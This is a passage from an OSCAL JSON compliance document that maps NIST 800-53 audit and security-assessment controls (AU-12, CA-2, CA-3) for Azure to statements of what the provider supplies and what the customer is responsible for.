records and audit record metadata as required. Service teams configure audit generation for the service layer to generate audit records and audit record metadata as required."}],"responsibilities":[{"uuid":"defbf4ef-c42c-4306-ad20-401a35da987d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-040"}],"description":"The customer is responsible for assigning personnel to select audit events for customer-deployed resources.","provided-uuid":"f0d5952e-264a-41ac-8258-3e596e4909b4"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"44467c8e-271f-4242-a209-b3b89f262662","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-041"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-12_smt.c","by-components":[{"uuid":"4953bef6-0b5b-4f54-86f6-c9697edd4797","export":{"provided":[{"uuid":"c47c3af7-2d06-42d8-84ea-558cd94bdb08","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-041"}],"description":"All Azure assets are required to generate audit records and audit record metadata as required. Audit records are captured in Geneva Monitoring, which allows for the record generation and reporting capabilities for the required auditable events. 
These capabilities also allow for the review of audit logs, should information contained within warrant a review."}],"responsibilities":[{"uuid":"27e47ee5-22cf-44b1-8a19-0be67f44a65c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-041"}],"description":"The customer is responsible for generating audit records for the subset of auditable events identified in AU-02.d and content defined in AU-03 for customer-deployed resources.","provided-uuid":"c47c3af7-2d06-42d8-84ea-558cd94bdb08"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"5af6c3bb-1e56-4ed3-95eb-2d98a213c12d","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-12.1","statements":[{"uuid":"f1267fd9-a00a-438f-9eb1-4552df483fb2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-042"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-12.1_smt","by-components":[{"uuid":"01b6b6eb-ce92-43fe-81bf-d62b9fea66b8","export":{"provided":[{"uuid":"37635c22-3775-4202-9f0e-99beabe01b99","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-042"}],"description":"Azure Security correlates audit logs across Azure using time stamps that are precise at least to the millisecond. The audit records are captured in Geneva Monitoring, which allows for the convergence of monitoring data for the required auditable events. 
To provide a time-correlated audit trail, all Azure logs are time correlated and stored in UTC time format. The time settings allow for a system-wide logical audit trail that is time-correlated to within one millisecond."}],"responsibilities":[{"uuid":"7de2206c-26fd-4c52-92fd-74cce8ca301f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-042"}],"description":"The customer is responsible for compiling audit records into a system-wide audit trail for customer-deployed resources.","provided-uuid":"37635c22-3775-4202-9f0e-99beabe01b99"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"6f3108e2-9272-4780-8a9b-edb73978234f","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-12.3","statements":[{"uuid":"9bb1d600-49a4-431b-b5e2-8c383d7e44eb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-043"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-12.3_smt","by-components":[{"uuid":"2fd4d9c3-64d2-4d12-b9b6-c249636f35b5","export":{"provided":[{"uuid":"700300bb-3bf7-4f58-a19b-b793dd318736","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-043"}],"description":"The Azure Security Logging and Monitoring (SLAM) team and the Security Response Team have developed sets of auditable events for Azure assets based on ongoing risk assessments of the system which incorporate government and industry baselines and requirements, identified vulnerabilities, 
business requirements, and Azure and C+AI Security Standards. The event sets are reviewed by the SLAM and Security Response Team when a significant change to the system is made to ensure any vulnerabilities exposed are being addressed by the set of auditable events. New events are incorporated when a new asset class is brought online or when a vulnerability or threat is identified through security assessments, security bulletins, and more."}],"responsibilities":[{"uuid":"2fe1322d-03fb-42d9-8ecc-adf436cb89e8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-043"}],"description":"The customer is responsible for providing the capability to extend or limit auditing on customer-deployed resources as necessary to meet organizational requirements.","provided-uuid":"700300bb-3bf7-4f58-a19b-b793dd318736"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"99dc402e-e151-4998-9030-328fe5d629e9","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ca-2","statements":[{"uuid":"60853d2f-bf12-4c63-93cc-8231f3a021e7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-006"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-2_smt.a","by-components":[{"uuid":"03f3b69b-bf65-4d71-b0c1-e3cf524e0ced","export":{"provided":[{"uuid":"b46dccba-ca1e-4b68-8868-8629cf1142d7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":
"CA-04-006"}],"description":"Microsoft utilizes a Third Party Assessment Organization (3PAO) to conduct assessments of the Azure clouds."}],"responsibilities":[{"uuid":"07dd07f3-0fa4-4ee2-b8d0-f2c9b5fed6c2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-006"}],"description":"The customer is responsible for selecting the appropriate assessor or assessment team for the type of assessment to be conducted on customer-deployed resources.","provided-uuid":"b46dccba-ca1e-4b68-8868-8629cf1142d7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"d5142e0b-8db3-454c-983e-7962eeb1a098","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-007"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-2_smt.b","by-components":[{"uuid":"2a2fdeae-472f-4972-86f9-0a88371856fe","export":{"provided":[{"uuid":"608a8fbd-e779-492e-be93-30d6390fb0f4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-007"}],"description":"Microsoft utilizes the Third Party Assessment Organization (3PAO) to develop a Security Assessment Plan (SAP) as part of the assessment performed for the Azure offering. 
The SAP addresses the following objectives:\n\n* Scope of the assessment\n* Assessment approach and methodology\n* Assessment environment\n* Known constraints, assumptions, and dependencies that may impact the assessment effort\n* Required resources for performing the assessment\n* Assessment schedule\n* Guidelines for evaluating and reporting the assessment findings\n* Security controls and control enhancements under assessment\n* Assessment procedures to be used to determine security control effectiveness\n\nThe SAP is then reviewed and approved by Azure, followed by a security assessment performed by the independent assessor. The SAP is based on NIST Special Publication 800-53A Revision 5."}],"responsibilities":[{"uuid":"0ec4f59d-b6dd-4797-bad2-82a8a01c59f5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-007"}],"description":"The customer is responsible for developing a security assessment plan for the customer-deployed system. The assessment plan should address the scope of the assessment, including: controls and enhancements; assessment procedures; and the assessment environment, team, and roles/responsibilities.","provided-uuid":"608a8fbd-e779-492e-be93-30d6390fb0f4"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"42137132-0e87-41d7-afa6-4e0507b95d8d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-008"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-2_smt.c","by-components":[{"uuid":"38b5eab9-9562-4aad-ade9-c4fa725e674b","export":{"provided":[{"uuid":"c96066d7-70c4-4600-858e-ab9b48ce9d44","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-008"}],"description":"The SAP approved by Azure and the Third Party Assessment Organization (3PAO) is reviewed and approved by the FedRAMP JAB, DISA/DoD authorizing officials, and other regulators as required as a part of the security authorization package for an authorization decision."}],"responsibilities":[{"uuid":"9b9430e5-7a06-4895-9604-376b4081de1b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-008"}],"description":"The customer is responsible for ensuring the control assessment plan is reviewed and approved by the authorizing official or designated representative prior to conducting the assessment for customer-deployed resources.","provided-uuid":"c96066d7-70c4-4600-858e-ab9b48ce9d44"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"2cf43e52-f8d4-4152-af20-4f39b4dd5d7b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-009"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-2_smt.d","by-components":[{"uuid":"f4afb723-dc83-4eb1-ad5e-29454227bcc5","export":{"provided":[{"uuid":"7779971f-bd2b-4a79-833d-43f298d16b66","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-009"}],"description":"The assessment utilizes the SAP and the SSP as supporting documents to complete the security assessment and authorization activities in accordance with NIST Special Publication 800-37 Revision 2, which is used to serve as the basis for conducting security assessment and authorization activities for Azure. Azure conducts assessments at least on an annual basis. The assessment procedures are documented in NIST Special Publication 800-53A Revision 5, which also provides the assessment scope and frequency in combination with guidance from regulators. 
Assessment activities occur on an annual basis against the agreed-upon SAP between Microsoft, the Third Party Assessment Organization (3PAO), and authorizing officials."}],"responsibilities":[{"uuid":"bc2f9cc8-cd88-47ce-a9bf-28f41833fcaa","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-009"}],"description":"The customer is responsible for assessing the security controls defined in CA-02 on customer-deployed resources.","provided-uuid":"7779971f-bd2b-4a79-833d-43f298d16b66"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"7e0ebb4d-6305-40b3-b211-d3585ae5dddf","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-010"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-2_smt.e","by-components":[{"uuid":"3bd33e59-2182-409e-8000-feb5738451e0","export":{"provided":[{"uuid":"6db424df-ad41-4788-af37-3d711a391675","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-010"}],"description":"Upon completion of the security assessment, a Security Assessment Report (SAR) is developed by the Third Party Assessment Organization (3PAO) to document the results of security assessment and the risks associated with the system. The SAR documents the results of the assessment, including security controls that are considered other than satisfied, security control weaknesses, recommended remediation steps, and the risks associated with the system. 
Azure and, if necessary, the 3PAO provide the SAR to the necessary authorizing officials, including the FedRAMP JAB, DISA/DoD authorizing officials, and other regulators as required, as a part of the security authorization package for an authorization decision."}],"responsibilities":[{"uuid":"bb634f60-5ab0-4eb8-8ff8-52732a6bbcc7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-010"}],"description":"The customer is responsible for producing a security assessment report. The customer is also responsible for delivering the security assessment results to the required individuals/roles.","provided-uuid":"6db424df-ad41-4788-af37-3d711a391675"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c48d2975-cbe4-4464-9ad2-fdb7cb698709","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-011"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-2_smt.f","by-components":[{"uuid":"400e19c1-ce8e-4004-94b4-76b05f2b3fd0","export":{"provided":[{"uuid":"e4b71871-6bf3-4fcb-b572-a8d08072ece1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-011"}],"description":"The assessment utilizes the SAP and the SSP as supporting documents to complete the security assessment and authorization activities in accordance with NIST Special Publication 800-37 Revision 2, which is used to serve as the basis for conducting security assessment and authorization activities for Azure. Azure conducts assessments at least on an annual basis. 
The assessment procedures are documented in NIST Special Publication 800-53A Revision 5, which also provides the assessment scope and frequency in combination with guidance from regulators. Assessment activities occur on an annual basis against the agreed-upon SAP between Microsoft, the Third Party Assessment Organization (3PAO), and authorizing officials. Azure and, if necessary, the 3PAO provide the SAR to the necessary authorizing officials including the FedRAMP JAB, DISA/DoD authorizing officials, and other regulators as required, as a part of the security authorization package for an authorization decision."}],"responsibilities":[{"uuid":"14916de9-7fc3-4e15-8fe3-cf32f59c22b9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-011"}],"description":"The customer is responsible for providing the results of control assessment to defined individuals or roles supporting customer-deployed resources.","provided-uuid":"e4b71871-6bf3-4fcb-b572-a8d08072ece1"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"275a1af3-49c7-425d-ae8f-5e9735b3a966","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ca-2.1","statements":[{"uuid":"23ecfb98-4710-4ac5-9816-cb82f10cb876","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-012"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-2.1_smt","by-components":[{"uuid":"87942d53-7637-4054-873a-a211f5e36714","export":{"provided":[{"uuid":"8fef5ef0-4cff-49cc-ae0d-f8c78e633d18","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-012"}],"description":"Azure employs an approved Third Party Assessment Organization (3PAO) as an independent assessor to conduct a security control assessment of Azure in accordance with requirements. 
The results of this assessment and related activities are submitted to Azure's authorizing officials."}],"responsibilities":[{"uuid":"890ec3be-a3ed-465a-994e-9f46cf0330bc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-012"}],"description":"The customer is responsible for employing independent assessors or assessment teams to conduct security control assessments.","provided-uuid":"8fef5ef0-4cff-49cc-ae0d-f8c78e633d18"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"dd0cdb76-3265-47d6-8c02-599539d44159","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ca-2.2","statements":[{"uuid":"c8929460-3cdc-442d-88a5-2951db03e205","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-013"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-2.2_smt","by-components":[{"uuid":"1e08f93a-b6ae-41d7-8464-f32826aa2d61","export":{"provided":[{"uuid":"faee6d7b-1b67-444a-9483-38d49e07ec7d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-013"}],"description":"The Third Party Assessment Organization (3PAO) assesses at least one third of all controls each year in accordance with continuous monitoring requirements, ensuring that all controls are assessed at least every three years. 
Other criteria, such as significant changes to the system or changes in risk posture and vulnerabilities, may trigger assessments. The Third Party Assessment Organization (3PAO) performs penetration testing at least annually. The Penetration Test Report covers Azure system components identified as part of the authorization boundary. Additionally, in-depth monitoring is performed by the Security Response Team on a continuous basis as a part of incident management. The Third Party Assessment Organization (3PAO) also performs an independent validation of all vulnerability scanning conducted by Azure."}],"responsibilities":[{"uuid":"5fa6499f-c2df-4a81-ac7d-91d794793c11","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-013"}],"description":"The customer is responsible for the selection of additional testing to be included as part of security control assessments.","provided-uuid":"faee6d7b-1b67-444a-9483-38d49e07ec7d"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"8a11ac6f-fd16-41ef-b6c0-b853d97cab5e","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ca-2.3","statements":[{"uuid":"f1e83136-f573-426c-8b6f-1e344931be61","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-014"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-2.3_smt","by-components":[{"uuid":"e2366c44-23b2-49ca-b507-2b248cff0e38","export":{"provided":[{"uuid":"953e8c22-39c3-4509-8033-a909aca3caae","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-014"}],"description":"Microsoft utilizes the Third Party Assessment Organization (3PAO) as an independent assessor to conduct a security control assessment of Azure and its components against the requirements of NIST SP 800-53, Rev. 4, Security and Privacy Controls for Federal Information Systems and Organizations. Azure accepts the results of the assessment from the 3PAO when the assessment meets the conditions of the Provisional ATO. 
The results of the assessment are documented in the SAR and submitted for authorizing official approval."}],"responsibilities":[{"uuid":"5c3106a8-1884-487c-b2d9-804ef0a3182f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-014"}],"description":"The customer is responsible for accepting assessment results for customer-deployed resources.","provided-uuid":"953e8c22-39c3-4509-8033-a909aca3caae"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"a35165aa-14ef-41e6-9049-2ba312e1f02b","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ca-3","statements":[{"uuid":"ee6486f4-2365-4dcf-abce-5093f6314134","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-015"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-3_smt.a","by-components":[{"uuid":"623df6a3-5ee2-4aa5-955b-dcfb1854c229","export":{"provided":[{"uuid":"9a3a8f5d-e87a-480f-a04b-d6a6e0adf8f2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-015"}],"description":"Microsoft authorizes connections from the information system to other information systems outside of the authorization boundary through the use of vendor agreements, Memoranda of Understanding (MOUs), Interconnection Security Agreements (ISAs), Terms of Conditions (T&C), and/or Service Level Agreements (SLAs). 
Microsoft has developed the necessary vendor agreements, MOUs, ISAs, T&C, and SLAs that document connections outside of the Federal authorization boundary. Microsoft follows guidance regarding government agencies in that Interconnection Security Agreements (ISAs) are not designed for use between a CSP and Federal Agency. An Agency ATO memo should be the governing document for Agency and Azure interaction and security requirement communications. The only interconnections are between internal Microsoft services, which do not require ISAs. The internal Microsoft services that connect with Azure cloud are CorpNet and Cosmos. CorpNet is the Microsoft corporate network. CorpNet contains services run on Microsoft's corporate network, not dedicated to Azure, such as source code repositories, system document repositories, and change ticketing. Cosmos is a service, not dedicated to Azure, that stores and reports on Azure log data. Microsoft Entra ID (formerly AAD) scrubs logs of customer information before sending logs to Cosmos. 
At this time, Azure does not have any dependencies on information systems external to Microsoft that require ISAs."}],"responsibilities":[{"uuid":"e714b558-46ac-4c11-821c-10e6b1986e4a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-015"}],"description":"The customer is responsible for authorizing connections from the customer-deployed system to external systems using Interconnection Security Assessments.","provided-uuid":"9a3a8f5d-e87a-480f-a04b-d6a6e0adf8f2"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"a27101c6-3d87-4458-a6ef-d5d3b2e2d4d1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-016"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-3_smt.b","by-components":[{"uuid":"f78c7a7c-cdd1-4905-b5d4-0ccc59bccd51","export":{"provided":[{"uuid":"a75bd2b4-bf28-470a-9887-8bc887ab5a30","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-016"}],"description":"Azure Security is responsible for developing and maintaining MOU/ISA/T&C/SLA documents for Azure. These documents include the interface characteristics, security requirements and the nature of the information being communicated with third parties. Azure documents in its MOU/ISA and T&C agreements with Microsoft services the interface characteristics, security requirements, information communicated, service requests, and service level agreements. These MOU/ISA and T&C documents serve as records between the Microsoft organizations of the commitments that were agreed to. 
Each document is signed by executive level Microsoft personnel who have responsibility over the systems interconnection."}],"responsibilities":[{"uuid":"6a035758-b6d1-4b62-b9fa-648e3da44e45","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-016"}],"description":"The customer is responsible for documenting the details of each interconnection defined in CA-03.a.","provided-uuid":"a75bd2b4-bf28-470a-9887-8bc887ab5a30"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"8e2cb037-b380-4446-b2a1-ffab940c3424","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-017"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-3_smt.c","by-components":[{"uuid":"af5b01df-0b1c-4513-a194-f9d980d39b86","export":{"provided":[{"uuid":"58520b68-18c6-468a-9768-f88f805f56a8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-017"}],"description":"Microsoft monitors its Interconnection Security Agreements (ISAs) to verify security requirements. Microsoft conducts annual meetings with third parties to review agreements and any changes, and ensures that connection data described in ISAs is logged and monitored as part of the continuous monitoring process. 
Microsoft also reviews ISAs as needed, based on input from authorizing officials, and updates them when necessary."}],"responsibilities":[{"uuid":"8a6e0025-9ea9-4365-b30f-db39e40f1d0f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-017"}],"description":"The customer is responsible for reviewing and updating Interconnection Security Agreements.","provided-uuid":"58520b68-18c6-468a-9768-f88f805f56a8"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"3e5e5efb-5872-4ba9-9a2a-68db4c69d655","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"ca-3.6","statements":[{"uuid":"d1ae135a-8be2-4408-9263-1fc9a92c729e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-018"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ca-3.6_smt","by-components":[{"uuid":"53009386-9e16-41cc-9882-2348c505b56e","export":{"provided":[{"uuid":"54569efd-946e-4a3d-962a-5f16e40e8b04","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"CA-04-018"}],"description":"The customer is responsible for verifying individuals or systems transferring data between interconnecting systems have the requisite authorizations prior to accepting such data on customer-deployed resources. Azure does not have any connections to external information systems. The only interconnections are with internal Microsoft services. 
Azure authorizes connections from the information system to other information systems outside of the authorization boundary using vendor agreements, Memoranda of Understanding (MOUs), Interconnection Security Agreements (ISAs), Terms of Conditions (T&C), and/or Service Level Agreements (SLAs). Microsoft has developed the necessary vendor agreements, MOUs, ISAs, T&C, and SLAs that document connections outside of the Federal authorization boundary. Azure follows guidance regarding government agencies in that Interconnection Security Agreements (ISAs) are not designed for use between a CSP and Federal Agency. An Agency ATO memo should be the governing document for Agency and Azure interaction and security requirement communications. The only interconnections are between internal Microsoft services, which do not require ISAs. Personnel supporting internal Microsoft services are subject to background screening requirements during the Microsoft hiring process. Microsoft hiring managers work with Microsoft HR to ensure personnel are cleared through background screening before they are granted access to Microsoft systems. As such, personnel are authorized through the background screening processes validated by Microsoft hiring managers and Microsoft HR. 
